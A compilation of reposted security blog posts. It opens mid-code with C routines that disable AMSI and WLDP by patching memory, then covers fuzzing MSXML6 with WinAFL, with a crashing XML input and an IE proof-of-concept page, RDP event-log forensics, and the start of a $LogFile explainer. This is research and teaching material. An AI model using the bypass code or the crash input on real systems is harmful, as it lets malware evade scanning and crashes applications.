    LPVOID                   hCLR;
    BOOL                     disabled = FALSE;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, j, res;
    PBYTE                    ds;
    MEMORY_BASIC_INFORMATION mbi;
    _PHAMSICONTEXT           ctx;
    
    hCLR = GetModuleHandleA("CLR");
    
    if(hCLR != NULL) {
      dos = (PIMAGE_DOS_HEADER)hCLR;  
      nt  = RVA2VA(PIMAGE_NT_HEADERS, hCLR, dos->e_lfanew);  
      sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
             nt->FileHeader.SizeOfOptionalHeader);
             
      // scan all writeable segments while disabled == FALSE
      for(i = 0; 
          i < nt->FileHeader.NumberOfSections && !disabled; 
          i++) 
      {
        // if this section is writeable, assume it's data
        if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
          // scan section for pointers to the heap
          ds = RVA2VA (PBYTE, hCLR, sh[i].VirtualAddress);
           
          for(j = 0; 
              j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR); 
              j += sizeof(ULONG_PTR)) 
          {
            // get pointer
            ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
            // query if the pointer
            res = VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
            if(res != sizeof(mbi)) continue;
            
            // if it's a pointer to heap or stack
            if ((mbi.State   == MEM_COMMIT    ) &&
                (mbi.Type    == MEM_PRIVATE   ) && 
                (mbi.Protect == PAGE_READWRITE))
            {
              ctx = (_PHAMSICONTEXT)ptr;
              // check if it contains the signature 
              if(ctx->Signature == 0x49534D41) {
                // corrupt it
                ctx->Signature++;
                disabled = TRUE;
                break;
              }
            }
          }
        }
      }
    }
    return disabled;
}

9. AMSI Bypass B (Patching Code 1)

CyberArk suggest patching AmsiScanBuffer with 2 instructions xor edi, edi, nop. If you wanted to hook the function, using a Length Disassembler Engine (LDE) might be helpful for calculating the correct number of prolog bytes to save before overwriting with a jump to alternate function. Since the AMSI context passed into this function is validated and one of the tests require the Signature to be “AMSI”, you might locate that immediate value and simply change it to something else. In the following example, we’re corrupting the signature in code rather than context/data as demonstrated by Matt Graeber.

BOOL DisableAMSI(VOID) {
    HMODULE        dll;
    PBYTE          cs;
    DWORD          i, op, t;
    BOOL           disabled = FALSE;
    _PHAMSICONTEXT ctx;
    
    // load AMSI library
    dll = LoadLibraryExA(
      "amsi", NULL, 
      LOAD_LIBRARY_SEARCH_SYSTEM32);
      
    if(dll == NULL) {
      return FALSE;
    }
    // resolve address of function to patch
    cs = (PBYTE)GetProcAddress(dll, "AmsiScanBuffer");
    
    // scan for signature
    for(i=0;;i++) {
      ctx = (_PHAMSICONTEXT)&cs[i];
      // is it "AMSI"?
      if(ctx->Signature == 0x49534D41) {
        // set page protection for write access
        VirtualProtect(cs, sizeof(ULONG_PTR), 
          PAGE_EXECUTE_READWRITE, &op);
          
        // change signature
        ctx->Signature++;
        
        // set page back to original protection
        VirtualProtect(cs, sizeof(ULONG_PTR), op, &t);
        disabled = TRUE;
        break;
      }
    }
    return disabled;
}

10. AMSI Bypass C (Patching Code 2)

Tal Liberman suggests overwriting the prolog bytes of AmsiScanBuffer to return 1. The following code also overwrites that function so that it returns AMSI_RESULT_CLEAN and S_OKfor every buffer scanned by CLR.

// fake function that always returns S_OK and AMSI_RESULT_CLEAN
static HRESULT AmsiScanBufferStub(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
    *result = AMSI_RESULT_CLEAN;
    return S_OK;
}

static VOID AmsiScanBufferStubEnd(VOID) {}

BOOL DisableAMSI(VOID) {
    BOOL    disabled = FALSE;
    HMODULE amsi;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load amsi
    amsi = LoadLibrary("amsi");
    
    if(amsi != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(amsi, "AmsiScanBuffer");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)AmsiScanBufferStubEnd -
          (ULONG_PTR)AmsiScanBufferStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with code stub
          memcpy(cs, &AmsiScanBufferStub, len);
          
          disabled = TRUE;
            
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return disabled;
}

After the patch is applied, we see unwanted software is flagged as safe.

11. WLDP Example in C

The following function demonstrates how to query the trust of dynamic code in-memory using Windows Lockdown Policy.

BOOL VerifyCodeTrust(const char *path) {
    WldpQueryDynamicCodeTrust_t _WldpQueryDynamicCodeTrust;
    HMODULE                     wldp;
    HANDLE                      file, map, mem;
    HRESULT                     hr = -1;
    DWORD                       low, high;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    _WldpQueryDynamicCodeTrust = 
      (WldpQueryDynamicCodeTrust_t)
      GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    
    // return FALSE on failure
    if(_WldpQueryDynamicCodeTrust == NULL) {
      printf("Unable to resolve address for WLDP.dll!WldpQueryDynamicCodeTrust.\n");
      return FALSE;
    }
    
    // open file reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      low = GetFileSize(file, &high);
      if(low != 0) {
        // create mapping
        map = CreateFileMapping(file, NULL, PAGE_READONLY, 0, 0, 0);
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(map, FILE_MAP_READ, 0, 0, 0);
          if(mem != NULL) {
            // verify signature
            hr = _WldpQueryDynamicCodeTrust(0, mem, low);              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return hr == S_OK;
}

12. WLDP Bypass A (Patching Code 1)

Overwriting the function with a code stub that always returns S_OK.

// fake function that always returns S_OK
static HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
    HANDLE fileHandle,
    PVOID  baseImage,
    ULONG  ImageSize)
{
    return S_OK;
}

static VOID WldpQueryDynamicCodeTrustStubEnd(VOID) {}

static BOOL PatchWldp(VOID) {
    BOOL    patched = FALSE;
    HMODULE wldp;
    DWORD   len, op, t;
    LPVOID  cs;
    
    // load wldp
    wldp = LoadLibrary("wldp");
    
    if(wldp != NULL) {
      // resolve address of function to patch
      cs = GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
      
      if(cs != NULL) {
        // calculate length of stub
        len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
          (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
          
        // make the memory writeable
        if(VirtualProtect(
          cs, len, PAGE_EXECUTE_READWRITE, &op))
        {
          // over write with stub
          memcpy(cs, &WldpQueryDynamicCodeTrustStub, len);
        
          patched = TRUE;
        
          // set back to original protection
          VirtualProtect(cs, len, op, &t);
        }
      }
    }
    return patched;
}

Although the methods described here are easy to detect, they remain effective against the latest release of DotNet framework on Windows 10. So long as it’s possible to patch data or code used by AMSI to detect harmful code, the potential to bypass it will always exist.

Fuzzing the MSXML6 library with WinAFL

Original text by symeonp

Introduction

In this blog post, I’ll write about how I tried to fuzz the MSXML library using the WinAFL fuzzer.

If you haven’t played around with WinAFL, it’s a massive fuzzer created by Ivan Fratric based on the lcumtuf’s AFL which uses DynamoRIO to measure code coverage and the Windows API for memory and process creation. Axel Souchet has been actively contributing features such as corpus minimization, latest afl stable builds, persistent execution mode which will cover on the next blog post and the finally the afl-tmin tool.

We will start by creating a test harness which will allow us to fuzz some parsing functionality within the library, calculate the coverage, minimise the test cases and finish by kicking off the fuzzer and triage the findings. Lastly, thanks to Mitja Kolsek from 0patch for providing the patch which will see how one can use the 0patch to patch this issue!

Using the above steps, I’ve managed to find a NULL pointer dereference on the msxml6!DTD::findEntityGeneral function, which I reported to Microsoft but got rejected as this is not a security issue. Fair enough, indeed the crash is crap, yet hopefully somebody might find interesting the techniques I followed!

The Harness

While doing some research I ended up on this page which Microsoft has kindly provided a sample C++ code which allows us to feed some XML files and validate its structure. I am going to use Visual Studio 2015 to build the following program but before I do that, I am slightly going to modify it and use Ivan’s charToWChar method so as to accept an argument as a file:

// xmlvalidate_fuzz.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#import <msxml6.dll>
extern "C" __declspec(dllexport)  int main(int argc, char** argv);

// Macro that calls a COM method returning HRESULT value.
#define CHK_HR(stmt)        do { hr=(stmt); if (FAILED(hr)) goto CleanUp; } while(0)

void dump_com_error(_com_error &e)
{
    _bstr_t bstrSource(e.Source());
    _bstr_t bstrDescription(e.Description());

    printf("Error\n");
    printf("\a\tCode = %08lx\n", e.Error());
    printf("\a\tCode meaning = %s", e.ErrorMessage());
    printf("\a\tSource = %s\n", (LPCSTR)bstrSource);
    printf("\a\tDescription = %s\n", (LPCSTR)bstrDescription);
}

_bstr_t validateFile(_bstr_t bstrFile)
{
    // Initialize objects and variables.
    MSXML2::IXMLDOMDocument2Ptr pXMLDoc;
    MSXML2::IXMLDOMParseErrorPtr pError;
    _bstr_t bstrResult = L"";
    HRESULT hr = S_OK;

    // Create a DOMDocument and set its properties.
    CHK_HR(pXMLDoc.CreateInstance(__uuidof(MSXML2::DOMDocument60), NULL, CLSCTX_INPROC_SERVER));

    pXMLDoc->async = VARIANT_FALSE;
    pXMLDoc->validateOnParse = VARIANT_TRUE;
    pXMLDoc->resolveExternals = VARIANT_TRUE;

    // Load and validate the specified file into the DOM.
    // And return validation results in message to the user.
    if (pXMLDoc->load(bstrFile) != VARIANT_TRUE)
    {
        pError = pXMLDoc->parseError;

        bstrResult = _bstr_t(L"Validation failed on ") + bstrFile +
            _bstr_t(L"\n=====================") +
            _bstr_t(L"\nReason: ") + _bstr_t(pError->Getreason()) +
            _bstr_t(L"\nSource: ") + _bstr_t(pError->GetsrcText()) +
            _bstr_t(L"\nLine: ") + _bstr_t(pError->Getline()) +
            _bstr_t(L"\n");
    }
    else
    {
        bstrResult = _bstr_t(L"Validation succeeded for ") + bstrFile +
            _bstr_t(L"\n======================\n") +
            _bstr_t(pXMLDoc->xml) + _bstr_t(L"\n");
    }

CleanUp:
    return bstrResult;
}

wchar_t* charToWChar(const char* text)
{
    size_t size = strlen(text) + 1;
    wchar_t* wa = new wchar_t[size];
    mbstowcs(wa, text, size);
    return wa;
}

int main(int argc, char** argv)
{
    if (argc < 2) {
        printf("Usage: %s <xml file>\n", argv[0]);
        return 0;
    }

    HRESULT hr = CoInitialize(NULL);
    if (SUCCEEDED(hr))
    {
        try
        {
            _bstr_t bstrOutput = validateFile(charToWChar(argv[1]));
            MessageBoxW(NULL, bstrOutput, L"noNamespace", MB_OK);
        }
        catch (_com_error &e)
        {
            dump_com_error(e);
        }
        CoUninitialize();
    }

    return 0;

}

Notice also the following snippet: extern "C" __declspec(dllexport) int main(int argc, char** argv);

Essentially, this allows us to use target_method argument which DynamoRIO will try to retrieve the address for a given symbol name as seen here.

I could use the offsets method as per README, but due to ASLR and all that stuff, we want to scale a bit the fuzzing and spread the binary to many Virtual Machines and use the same commands to fuzz it. The extern "C" directive will unmangle the function name and will make it look prettier.

To confirm that indeed DynamoRIO can use this method the following command can be used:

dumpbin /EXPORTS xmlvalidate_fuzz.exe

Viewing the exported functions.

Now let’s quickly run the binary and observe the output. You should get the following output:

Output from the xmlvlidation binary.

Code Coverage

WinAFL

Since the library is closed source, we will be using DynamoRIO’s code coverage library feature via the WinAFL:

C:\DRIO\bin32\drrun.exe -c winafl.dll -debug -coverage_module msxml6.dll -target_module xmlvalidate.exe -target_method main -fuzz_iterations 10 -nargs 2 -- C:\xml_fuzz_initial\xmlvalidate.exe C:\xml_fuzz_initial\nn-valid.xml

WinAFL will start executing the binary ten times. Once this is done, navigate back to the winafl folder and check the log file:

Checking the coverage within WinAFL.

From the output we can see that everything appears to be running normally! On the right side of the file, the dots depict the coverage of the DLL, if you scroll down you’ll see that we did hit many function as we are getting more dots throughout the whole file. That’s a very good indication that we are hiting a lot of code and we properly targeting the MSXML6 library.

Lighthouse — Code Coverage Explorer for IDA Pro

This plugin will help us understand better which function we are hitting and give a nice overview of the coverage using IDA. It’s an excellent plugin with very good documentation and has been developed by Markus Gaasedelen (@gaasedelen) Make sure to download the latest DynamoRIO version 7, and install it as per instrcutions here. Luckily, we do have two sample test cases from the documentation, one valid and one invalid. Let’s feed the valid one and observe the coverage. To do that, run the following command:

C:\DRIO7\bin64\drrun.exe -t drcov -- xmlvalidate.exe nn-valid.xml

Next step fire up IDA, drag the msxml6.dll and make sure to fetch the symbols! Now, check if a .log file has been created and open it on IDA from the File -> Load File -> Code Coverage File(s) menu. Once the coverage file is loaded it will highlight all the functions that your test case hit.

Case minimisation

Now it’s time to grab some XML files (as small as possible). I’ve used a slightly hacked version of joxean’s find_samples.py script. Once you get a few test cases let’s minimise our initial seed files. This can be done using the following command:

python winafl-cmin.py --working-dir C:\winafl\bin32 -D C:\DRIO\bin32 -t 100000 -i C:\xml_fuzz\samples -o C:\minset_xml -coverage_module msxml6.dll -target_module xmlvalidate.exe -target_method fuzzme -nargs 1 -- C:\xml_fuzz\xmlvalidate.exe @@

You might see the following output:

corpus minimization tool for WinAFL by <0vercl0k@tuxfamily.org> 
Based on WinAFL by <ifratric@google.com> 
Based on AFL by <lcamtuf@google.com> 
[+] CWD changed to C:\winafl\bin32. 
[*] Testing the target binary... 
[!] Dry-run failed, 2 executions resulted differently: 
Tuples matching? False 
Return codes matching? True

I am not quite sure but I think that the winafl-cmin.py script expects that the initial seed files lead to the same code path, that is we have to run the script one time for the valid cases and one for the invalid ones. I might be wrong though and maybe there’s a bug which in that case I need to ping Axel.

Let’s identify the ‘good’ and the ‘bad’ XML test cases using this bash script:

$ for file in *; do printf "==== FILE: $file =====\n"; /cygdrive/c/xml_fuzz/xmlvalidate.exe $file ;sleep 1; done

The following screenshot depicts my results:

Looping through the test cases with Cygwin

Feel free to expirement a bit, and see which files are causing this issue — your mileage may vary. Once you are set, run again the above command and hopefully you’ll get the following result:

Minimising our initial seed files.

So look at that! The initial campaign included 76 cases which after the minimisation it was narrowed down to 26. 
Thank you Axel!

With the minimised test cases let’s code a python script that will automate all the code coverage:

import sys
import os

testcases = []
for root, dirs, files in os.walk(".", topdown=False):
    for name in files:
        if name.endswith(".xml"):
            testcase =  os.path.abspath(os.path.join(root, name))
            testcases.append(testcase)

for testcase in testcases:
    print "[*] Running DynamoRIO for testcase: ", testcase
    os.system("C:\\DRIO7\\bin32\\drrun.exe -t drcov -- C:\\xml_fuzz\\xmlvalidate.exe %s" % testcase)

The above script produced the following output for my case:

Coverage files produced by the Lighthouse plugin.

As previously, using IDA open all those .log files under File -> Load File -> Code Coverage File(s) menu.

Code coverage using the Lighthouse plugin and IDA Pro.

Interestingly enough, notice how many parse functions do exist, and if you navigate around the coverage you’ll see that we’ve managed to hit a decent amount of interesting code.

Since we do have some decent coverage, let’s move on and finally fuzz it!

All I do is fuzz, fuzz, fuzz

Let’s kick off the fuzzer:

afl-fuzz.exe -i C:\minset_xml -o C:\xml_results -D C:\DRIO\bin32\ -t 20000 -- -coverage_module MSXML6.dll -target_module xmlvalidate.exe -target_method main -nargs 2 -- C:\xml_fuzz\xmlvalidate.exe @@

Running the above yields the following output:

WinAFL running with a slow speed.

As you can see, the initial code does that job — however the speed is very slow. Three executions per second will take long to give some proper results. Interestingly enough, I’ve had luck in the past and with that speed (using python and radamsa prior the afl/winafl era) had success in finding bugs and within three days of fuzzing!

Let’s try our best though and get rid of the part that slows down the fuzzing. If you’ve done some Windows programming you know that the following line initialises a COM object which could be the bottleneck of the slow speed:

HRESULT hr = CoInitialize(NULL);

This line probably is a major issue so in fact, let’s refactor the code, we are going to create a fuzzme method which is going to receive the filename as an argument outside the COM initialisation call. The refactored code should look like this:

--- cut ---

extern "C" __declspec(dllexport) _bstr_t fuzzme(wchar_t* filename);

_bstr_t fuzzme(wchar_t* filename)
{
    _bstr_t bstrOutput = validateFile(filename);
    //bstrOutput += validateFile(L"nn-notValid.xml");
    //MessageBoxW(NULL, bstrOutput, L"noNamespace", MB_OK);
    return bstrOutput;

}
int main(int argc, char** argv)
{
    if (argc < 2) {
        printf("Usage: %s <xml file>\n", argv[0]);
        return 0;
    }

    HRESULT hr = CoInitialize(NULL);
    if (SUCCEEDED(hr))
    {
        try
        {
            _bstr_t bstrOutput = fuzzme(charToWChar(argv[1]));
        }
        catch (_com_error &e)
        {
            dump_com_error(e);
        }
        CoUninitialize();
    }
    return 0;
}
--- cut ---

You can grab the refactored version here. With the refactored binary let’s run one more time the fuzzer and see if we were right. This time, we will pass the fuzzme target_method instead of main, and use only one argument which is the filename. While we are here, let’s use the lcamtuf’s xml.dic from here.

afl-fuzz.exe -i C:\minset_xml -o C:\xml_results -D C:\DRIO\bin32\ -t 20000 -x xml.dict -- -coverage_module MSXML6.dll -target_module xmlvalidate.exe -target_method fuzzme -nargs 1 -- C:\xml_fuzz\xmlvalidate.exe @@

Once you’ve run that, here’s the output within a few seconds of fuzzing on a VMWare instance:

WinAFL running with a massive speed.

Brilliant! That’s much much better, now let it run and wait for crashes! 

The findings — Crash triage/analysis

Generally, I’ve tried to fuzz this binary with different test cases, however unfortunately I kept getting the NULL pointer dereference bug. The following screenshot depicts the findings after a ~ 12 days fuzzing campaign:

Fuzzing results after 12 days.

Notice that a total of 33 million executions were performed and 26 unique crashes were discovered!

In order to triage these findings, I’ve used the BugId tool from SkyLined, it’s an excellent tool which will give you a detailed report regarding the crash and the exploitability of the crash.

Here’s my python code for that:

import sys
import os


sys.path.append("C:\\BugId")

testcases = []
for root, dirs, files in os.walk(".\\fuzzer01\\crashes", topdown=False):
    for name in files:
        if name.endswith("00"):
            testcase =  os.path.abspath(os.path.join(root, name))
            testcases.append(testcase)

for testcase in testcases:
    print "[*] Gonna run: ", testcase
    os.system("C:\\python27\\python.exe C:\\BugId\\BugId.py C:\\Users\\IEUser\\Desktop\\xml_validate_results\\xmlvalidate.exe -- %s" % testcase)

The above script gives the following output:

Running cBugId to triage the crashes..

Once I ran that for all my crashes, it clearly showed that we’re hitting the same bug. To confirm, let’s fire up windbg:

0:000> g
(a6c.5c0): Access violation - code c0000005 (!!! second chance !!!)
eax=03727aa0 ebx=0012fc3c ecx=00000000 edx=00000000 esi=030f4f1c edi=00000002
eip=6f95025a esp=0012fbcc ebp=0012fbcc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
msxml6!DTD::findEntityGeneral+0x5:
6f95025a 8b4918          mov     ecx,dword ptr [ecx+18h] ds:0023:00000018=????????
0:000> kv
ChildEBP RetAddr  Args to Child              
0012fbcc 6f9de300 03727aa0 00000002 030f4f1c msxml6!DTD::findEntityGeneral+0x5 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\dtd\dtd.hxx @ 236]
0012fbe8 6f999db3 03727aa0 00000003 030c5fb0 msxml6!DTD::checkAttrEntityRef+0x14 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\dtd\dtd.cxx @ 1470]
0012fc10 6f90508f 030f4f18 0012fc3c 00000000 msxml6!GetAttributeValueCollapsing+0x43 (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\parse\nodefactory.cxx @ 771]
0012fc28 6f902d87 00000003 030f4f14 6f9051f4 msxml6!NodeFactory::FindAttributeValue+0x3c (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\parse\nodefactory.cxx @ 743]
0012fc8c 6f8f7f0d 030c5fb0 030c3f20 01570040 msxml6!NodeFactory::CreateNode+0x124 (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\parse\nodefactory.cxx @ 444]
0012fd1c 6f8f5042 010c3f20 ffffffff c4fd70d3 msxml6!XMLParser::Run+0x740 (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\tokenizer\parser\xmlparser.cxx @ 1165]
0012fd58 6f8f4f93 030c3f20 c4fd7017 00000000 msxml6!Document::run+0x89 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\om\document.cxx @ 1494]
0012fd9c 6f90a95b 030ddf58 00000000 00000000 msxml6!Document::_load+0x1f1 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\om\document.cxx @ 1012]
0012fdc8 6f8f6c75 037278f0 00000000 c4fd73b3 msxml6!Document::load+0xa5 (FPO: [Non-Fpo]) (CONV: thiscall) [d:\w7rtm\sql\xml\msxml6\xml\om\document.cxx @ 754]
0012fe38 00401d36 00000000 00000008 00000000 msxml6!DOMDocumentWrapper::load+0x1ff (FPO: [Non-Fpo]) (CONV: stdcall) [d:\w7rtm\sql\xml\msxml6\xml\om\xmldom.cxx @ 1111]
-- cut --
Running cBugId to triage the crashes..

Let’s take a look at one of the crasher:

C:\Users\IEUser\Desktop\xml_validate_results\fuzzer01\crashes>type id_000000_00
<?xml version="&a;1.0"?>
<book xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:noNamespaceSchemaLocation="nn.xsd"
      id="bk101">
   <author>Gambardella, Matthew</author>
   <title>XML Developer's Guide</title>
   <genre>Computer</genre>
   <price>44.95</price>
   <publish_date>2000-10-01</publish_date>
   <description>An in-depth look at creating applications with
   XML.</description>

As you can see, if we provide some garbage either on the xml version or the encoding, we will get the above crash. Mitja also minimised the case as seen below:

<?xml version='1.0' encoding='&aaa;'?>

The whole idea of fuzzing this library was based on finding a vulnerability within Internet Explorer’s context and somehow trigger it. After a bit of googling, let’s use the following PoC (crashme.html) and see if it will crash IE11:

<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>

var xmlDoc = new ActiveXObject("Msxml2.DOMDocument.6.0");
xmlDoc.async = false;
xmlDoc.load("crashme.xml");
if (xmlDoc.parseError.errorCode != 0) {
   var myErr = xmlDoc.parseError;
   console.log("You have error " + myErr.reason);
} else {
   console.log(xmlDoc.xml);
}

</script>
</body>
</html>

Running that under Python’s SimpleHTTPServer gives the following:

Running cBugId to triage the crashes..

Bingo! As expected, at least with PageHeap enabled we are able to trigger exactly the same crash as with our harness. Be careful not to include that xml on Microsoft Outlook, because it will also crash it as well! Also, since it’s on the library itself, had it been a more sexy crash would increase the attack surface!

Patching

After exchanging a few emails with Mitja, he kindly provided me the following patch which can be applied on a fully updated x64 system:

;target platform: Windows 7 x64
;
RUN_CMD C:\Users\symeon\Desktop\xmlvalidate_64bit\xmlvalidate.exe C:\Users\symeon\Desktop\xmlvalidate_64bit\poc2.xml
MODULE_PATH "C:\Windows\System32\msxml6.dll"
PATCH_ID 200000
PATCH_FORMAT_VER 2
VULN_ID 9999999
PLATFORM win64


patchlet_start
 PATCHLET_ID 1
 PATCHLET_TYPE 2
 
 PATCHLET_OFFSET 0xD093D 
 PIT msxml6.dll!0xD097D
  
 code_start

  test rbp, rbp ;is rbp (this) NULL?
  jnz continue
  jmp PIT_0xD097D
  continue:
 code_end
patchlet_end

Let’s debug and test that patch, I’ve created an account and installed the 0patch agent for developers, and continued by right clicking on the above .0pp file:

Running the crasher with the 0patch console

Once I’ve executed my harness with the xml crasher, I immediately hit the breakpoint:

Hitting the breakpoint under Windbg

From the code above, indeed rbp is null which would lead to the null pointer dereference. Since we have deployed the 0patch agent though, in fact it’s going to jump to msxml6.dll!0xD097D and avoid the crash:

Bug fully patched!

Fantastic! My next step was to fire up winafl again with the patched version which unfortunately failed. Due to the nature of 0patch (function hooking?) it does not play nice with WinAFL and it crashes it.

Nevertheless, this is a sort of “DoS 0day” and as I mentioned earlier I reported it to Microsoft back in June 2017 and after twenty days I got the following email:

MSRC Response!

I totally agree with that decision, however I was mostly interested in patching the annoying bug so I can move on with my fuzzing :o) 
After spending a few hours on the debugger, the only “controllable” user input would be the length of the encoding string:

eax=03052660 ebx=0012fc3c ecx=00000011 edx=00000020 esi=03054f24 edi=00000002
eip=6f80e616 esp=0012fbd4 ebp=0012fbe4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
msxml6!Name::create+0xf:
6f80e616 e8e7e6f9ff      call    msxml6!Name::create (6f7acd02)
0:000> dds esp L3
0012fbd4  00000000
0012fbd8  03064ff8
0012fbdc  00000003

0:000> dc 03064ff8 L4
03064ff8  00610061 00000061 ???????? ????????  a.a.a...????????

The above unicode string is in fact our entity from the test case, where the number 3 is the length aparently (and the signature of the function: Name *__stdcall Name::create(String *pS, const wchar_t *pch, int iLen, Atom *pAtomURN))

Conclusion

As you can see, spending some time on Microsoft’s APIs/documentation can be gold! Moreover, refactoring some basic functions and pinpointing the issues that affect the performance can also lead to massive improvements!

On that note I can’t thank enough Ivan for porting the afl to Windows and creating this amazing project. Moreover thanks to Axel as well who’s been actively contributing and adding amazing features.

Shouts to my colleague Javier (we all have one of those heap junkie friends, right?) for motivating me to write this blog, Richard who’s been answering my silly questions and helping me all this time, Mitja from the 0patch team for building this patch and finally Patroklo for teaching me a few tricks about fuzzing a few years ago!

References

Evolutionary Kernel Fuzzing-BH2017-rjohnson-FINAL.pdf
Super Awesome Fuzzing, Part One

RDP Event Log DFIR

Original text by grayfold3d

A good detection technique to spot Remote Desktop Connections that are exposed to the internet is to scan RDP event logs for any events where the source IP is a non-RFC 1918 address. This provides you a good way to check for locations that may be port forwarding RDP, like work from home users.

During a recent investigation involving Remote Desktop Connections, I discovered some behavior that limited this search functionality and was contrary to what I’d observed in previous cases and seen documented in other blogs. I’ve done some testing over the last few days and thought I’d pass along what I’d found. 

Prior Observations

I refer to the following two sources whenever I need a refresher on RDP logging. They both do a great job of explaining what gets logged at the various stages of an RDP connection: Login, Logoff, Disconnect, Reconnect, etc.

During previous investigations, I’d observed Event ID 1149 in the TerminalServices-RemoteConnectionManager/Operational log occurring as soon as an RDP connection was established. This event was logged prior to credentials being entered during the login process and my interpretation was that this indicated that the RDP client has connected to the RDP host successfully. It did not indicate that a login had successfully occurred. 
This made Event ID 1149 very valuable as it gave you the means to spot failed logins or brute force login attempts even if auditing of failed logins was not enabled. As mentioned above, the presence of a non-RFC 1918 address in one of these logs is a good indicator that that device has been in a location with RDP exposed to the internet.

Event ID 1149 was followed by a series of other events which varied depending on whether a previous session was being reconnected and whether the authentication was successful.

During successful authentication, you observe Event ID 4624 in the Windows Security log. Note there is a 4624 event where the “Logon Type” is 3. This occurs because this connection is using Network Level Authentication. This will be followed by another 4624 Event with logon type 10 (or 7 for reconnects). (*Thanks to @securitycatnip for catching an error in the original post.)

Event ID 21 and 22 (new connections) are logged in the TerminalServices-LocalSessionManager/Operational log.

For failed logins, Event ID 1149 would be followed by Event ID 4625 in the Windows Security Log.

An important point is that Event ID 4625 ( for login failures) is not logged by default in desktop operating systems like Windows 7, 8, and 10.

Current Observations

During a recent investigation, I noticed that Event ID 1149 was not being logged when the login was unsuccessful. This was observed when connecting to a Windows 10 device. If the login succeeded, the 1149 event was logged as seen previously. In both cases, Event ID 261 is logged in the TS RemoteConnectionManager/Operational log but unfortunately, this doesn’t give us any information on who was attempting to connect.

After performing some additional testing and reviewing notes from previous cases, I’ve found the following. Please note, not all Operating Systems or OS versions are accounted for here as I tested what I had available.

Event ID 1149 was not logged prior to successful authentication and only occurs if authentication is successful on the following Operating Systems:

  • Windows Server 2012
  • Windows Server 2016
  • Windows 7
  • Windows 8.1
  • Windows 10 (version 1803)

Event ID 1149 was logged prior to successful authentication on the following Operating Systems:

  • Windows Server 2008
  • Windows SBS Server 2011

Additional Log Sources

I performed a timeline of the Event Logs after a series of failed and successful RDP connections to see if anything else was logged that might be helpful in identifying failed RDP login attempts. I discovered that the RemoteDesktopServices-RdpCoreTS/Operational log does log Event ID 131 when the RDP connection is first established. This occurs prior to authentication like Event ID 1149 did previously and while there is no workstation name or user account associated with this log entry, it does provide the connecting IP. Unfortunately, this log channel does not exist in Windows 7.

I touched on Network Level Authentication above when discussing the “Logon Type” field recorded in the Security log. NLA requires the client to authenticate before connecting to the host. An easy way to tell if NLA is disabled is that when connecting to a host, you see the login screen of that device before entering credentials. This allows an attacker to see who is currently logged in, other user accounts on the PC and the domain name.

NLA really should be enabled on most devices but if it is not, you can find an additional event in the TerminalServices-RemoteConnectionManager/Admin log. Event ID 1158 will also display the source IP. While this log is available in Windows 7, I was not able to generate Event ID 1158 when connecting to a Windows 7 PC without NLA.

Closing

One final tip. If you’re doing any RDP testing and want to force your client to connect without NLA, you can do so by editing the RDP connection file. To do so, save the .RDP file and open it in notepad or another text editior. Paste the following line anywhere in the file:
enablecredsspsupport:i:0

If you’ve got any feedback, feel free to share. I’m still on the lookout for a good way to identify brute force RDP attempts on default Windows 7 configurations so if you’ve got any thoughts on that, let me know.

How the $LogFile works?

Original text by MSUHANOV

In the official NTFS implementation, all metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called write-ahead logging.

The logged metadata is stored in a file called “$LogFile”, which is found in a root directory of an NTFS file system.

Currently, there is no much documentation for this file available. Most sources are either too high-level (describing the logging and recovery processes in general) or just contain the layout of key structures without further description.

The process of metadata logging is based on two components: the log file service (LFS) and the NTFS client of the LFS (both are implemented as a part of the NTFS driver).

